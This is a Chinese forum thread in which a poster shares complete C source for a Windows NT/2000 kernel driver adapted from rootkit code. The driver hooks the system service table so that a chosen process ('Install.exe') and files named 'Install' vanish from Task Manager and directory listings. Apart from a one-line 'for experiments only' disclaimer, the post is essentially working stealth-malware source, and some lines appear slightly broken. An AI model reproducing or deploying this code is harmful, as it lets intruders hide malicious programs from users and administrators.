NT/2000下面驱动实现真正的进程,文件,目录隐藏(1分)

  • 主题发起人 主题发起人 热血
  • 开始时间 开始时间

热血

Unregistered / Unconfirmed
GUEST, unregistred user!
NT/2000下面用驱动实现真正的进程,文件,目录隐藏
qinzm
最近看了一下RootKit的代码,把其中进程文件目录隐藏的代码整理出来,
重新编译成一个完整可用的驱动,可以实现定制的进程文件目录的隐藏,
隐藏后,进程管理器无法看到,文件和目录也无法看到,但知道绝对路径的
情况下,可以正常使用隐藏的文件,只对NT/2000有效,编译后的驱动只有2k多.
程序用于实验,请勿非法使用
//////////////////////////////////////////////////////////////////////////////////////
//
// FileName : D:/Temp/Hide/Driver.c
// Version : 1.0
// Creater : QinzhiMing
// Date : 2002:2:25 14:42
// Comment :
//
//////////////////////////////////////////////////////////////////////////////////////
#include "ntddk.h"
#include "Driver.h"
#include "stdio.h"
/////////////////////////////////////////////////////////////////////////////
char g_szHideProcName[] = "Install.exe";
WCHAR g_wszHideFileName[] = L"Install";
ULONG g_nProcessNameOffset;
BOOL g_hide_proc = TRUE;
/////////////////////////////////////////////////////////////////////////////
NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegisterPath)
{
int i;
NTSTATUS ntStatus;
PDEVICE_OBJECT pDeviceObject;
WCHAR wchrDeviceName[] = L"//Device//Hide";
WCHAR wchrDeviceLinkName[] = L"//DosDevices//Hide";
UNICODE_STRING wszDeviceName;
UNICODE_STRING wszDeviceLinkName;

RtlInitUnicodeString(&wszDeviceName, wchrDeviceName);
ntStatus = IoCreateDevice(pDriverObject, 0, &wszDeviceName, 0x00008000, 0, FALSE, &pDeviceObject);
if (ntStatus != STATUS_SUCCESS)
goto Exit0;
RtlInitUnicodeString(&wszDeviceLinkName, wchrDeviceLinkName);
ntStatus = IoCreateSymbolicLink(&wszDeviceLinkName, &wszDeviceName);
if (ntStatus != STATUS_SUCCESS)
{
IoDeleteDevice(pDeviceObject);
goto Exit0;
}
for (i = 0;
i < IRP_MJ_MAXIMUM_FUNCTION;
i++)
pDriverObject->MajorFunction = OnDriverDispatch;
pDriverObject->DriverUnload = OnDriverUnload;
GetProcessNameOffset();
HookSysCall();//Hook系统服务
Exit0:
return ntStatus;
}
/////////////////////////////////////////////////////////////////////////////
void GetProcessNameOffset()
{
int i;
PEPROCESS CurrentProc;
CurrentProc = PsGetCurrentProcess();
for (i = 0;
i < 3 * PAGE_SIZE;
i++)
{
if(!strncmp("System", (PCHAR)CurrentProc + i, strlen("System")))
g_nProcessNameOffset = i;
}
}
/////////////////////////////////////////////////////////////////////////////
BOOL GetProcessName(PCHAR pszName)
{
char *pszTempName;
PEPROCESS CurrentProc;

if (g_nProcessNameOffset)
{
CurrentProc = PsGetCurrentProcess();
pszTempName = (PCHAR)CurrentProc + g_nProcessNameOffset;
strncpy(pszName, pszTempName, NT_PROCNAMELEN);
pszName[NT_PROCNAMELEN] = 0;
return TRUE;
}
return FALSE;
}
/////////////////////////////////////////////////////////////////////////////
void HookSysCall()
{
OldZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));
OldZwQueryDirectoryFile = (ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile));
_asm cli;
(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) = NewZwQuerySystemInformation;
(ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile)) = NewZwQueryDirectoryFile;
_asm sti;
}
/////////////////////////////////////////////////////////////////////////////
void UnHookSysCall()
{
_asm cli;
(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) = OldZwQuerySystemInformation;
(ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile)) = OldZwQueryDirectoryFile;
_asm sti;
}
/////////////////////////////////////////////////////////////////////////////
NTSTATUS NewZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{
NTSTATUS ntStatus;
CHAR szProcessName[PROCNAMELEN];
ANSI_STRING astrProcName;
ANSI_STRING astrHideProcName;
struct SYSTEM_PROCESS *Curr;
struct SYSTEM_PROCESS *Prev;
RtlInitAnsiString(&amp;astrHideProcName, g_szHideProcName);
GetProcessName(szProcessName);
ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation))(
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength);

if(!NT_SUCCESS(ntStatus))
goto Exit0;
if (memcmp(szProcessName, g_szHideProcName, strlen(g_szHideProcName)) == 0)//比较当前进程是否隐藏进程,是就退出,不对隐藏进程的做任何限制
goto Exit0;
if (SystemInformationClass != 5)
goto Exit0;
Curr = (struct SYSTEM_PROCESS *)SystemInformation;
Prev = NULL;
Loop:
if (Curr == NULL)
goto Exit0;
RtlUnicodeStringToAnsiString(&amp;astrProcName, &amp;(Curr->ProcessName), TRUE);
if ((astrProcName.Length > 0) &amp;&amp;
(astrProcName.Length < 255))
;
else
goto Next;
if (RtlCompareString(&amp;astrProcName, &amp;astrHideProcName, TRUE) != 0)
goto Next;
if (Prev)
{
if (Curr->NextEntryDelta)
Prev->NextEntryDelta += Curr->NextEntryDelta;
else
Prev->NextEntryDelta = 0;
}
else
{
if (Curr->NextEntryDelta)
(char *)SystemInformation += Curr->NextEntryDelta;
else
SystemInformation = NULL;
}
Next:
RtlFreeAnsiString(&amp;astrProcName);
Prev = Curr;
if (Curr->NextEntryDelta)
(char *)Curr += Curr->NextEntryDelta;
else
Curr = NULL;
goto Loop;
Exit0:
return ntStatus;
}
/////////////////////////////////////////////////////////////////////////////
NTSTATUS OnDriverDispatch(IN PDEVICE_OBJECT pDeviceObject, IN PIRP Irp)
{
/* PIO_STACK_LOCATION IrpStack;
Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
IrpStack = IoGetCurrentIrpStackLocation(Irp);*/
Irp->IoStatus.Status = STATUS_SUCCESS;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return Irp->IoStatus.Status;
}
/////////////////////////////////////////////////////////////////////////////
void OnDriverUnload(IN PDRIVER_OBJECT pDriverObject)
{
WCHAR wchrDeviceLinkName[] = L"//DosDevices//Hide";
UNICODE_STRING wszDeviceLinkName;

UnHookSysCall();
RtlInitUnicodeString(&amp;wszDeviceLinkName, wchrDeviceLinkName);
IoDeleteSymbolicLink(&amp;wszDeviceLinkName);
IoDeleteDevice(pDriverObject->DeviceObject);
}
/////////////////////////////////////////////////////////////////////////////
NTSTATUS NewZwQueryDirectoryFile(
IN HANDLE hFile,
IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
IN PVOID IoApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInformationBuffer,
IN ULONG FileInformationBufferLength,
IN FILE_INFORMATION_CLASS FileInfoClass,
IN BOOLEAN bReturnOnlyOneEntry,
IN PUNICODE_STRING PathMask OPTIONAL,
IN BOOLEAN bRestartQuery)
{
NTSTATUS ntStatus;
CHAR szProcessName[PROCNAMELEN];
BOOL bLastOne;
int iPos;
int iLeft;
pDirEntry pCurrDir;
pDirEntry pLastDir;

GetProcessName(szProcessName);
ntStatus = ((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile)) (
hFile,
hEvent,
IoApcRoutine,
IoApcContext,
pIoStatusBlock,
FileInformationBuffer,
FileInformationBufferLength,
FileInfoClass,
bReturnOnlyOneEntry,
PathMask,
bRestartQuery);
if (!NT_SUCCESS(ntStatus))
goto Exit0;
if (memcmp(szProcessName, "Install", 7) == 0)
goto Exit0;
pCurrDir = (pDirEntry)FileInformationBuffer;
pLastDir = NULL;
do
{
bLastOne = !(pCurrDir->dwLenToNext);
if (RtlCompareMemory((PVOID)&amp;pCurrDir->suName[0], (PVOID)&amp;g_wszHideFileName[0], 14) == 14)
{
if (bLastOne)
{
if (pCurrDir == (pDirEntry)FileInformationBuffer)
ntStatus = 0x80000006;
else

pLastDir->dwLenToNext = 0;
break;
}
else

{
iPos = ((ULONG)pCurrDir) - (ULONG)FileInformationBuffer;
iLeft = (DWORD)FileInformationBufferLength - iPos - pCurrDir->dwLenToNext;
RtlCopyMemory((PVOID)pCurrDir, (PVOID)((char *)pCurrDir + pCurrDir->dwLenToNext), (DWORD)iLeft);
continue;
}
}
pLastDir = pCurrDir;
pCurrDir = (pDirEntry)((char *)pCurrDir + pCurrDir->dwLenToNext );
} while (!bLastOne);
Exit0:
return ntStatus;
}
/////////////////////////////////////////////////////////////////////////////
 
给大家看看,我提
 
接受答案了.
 
后退
顶部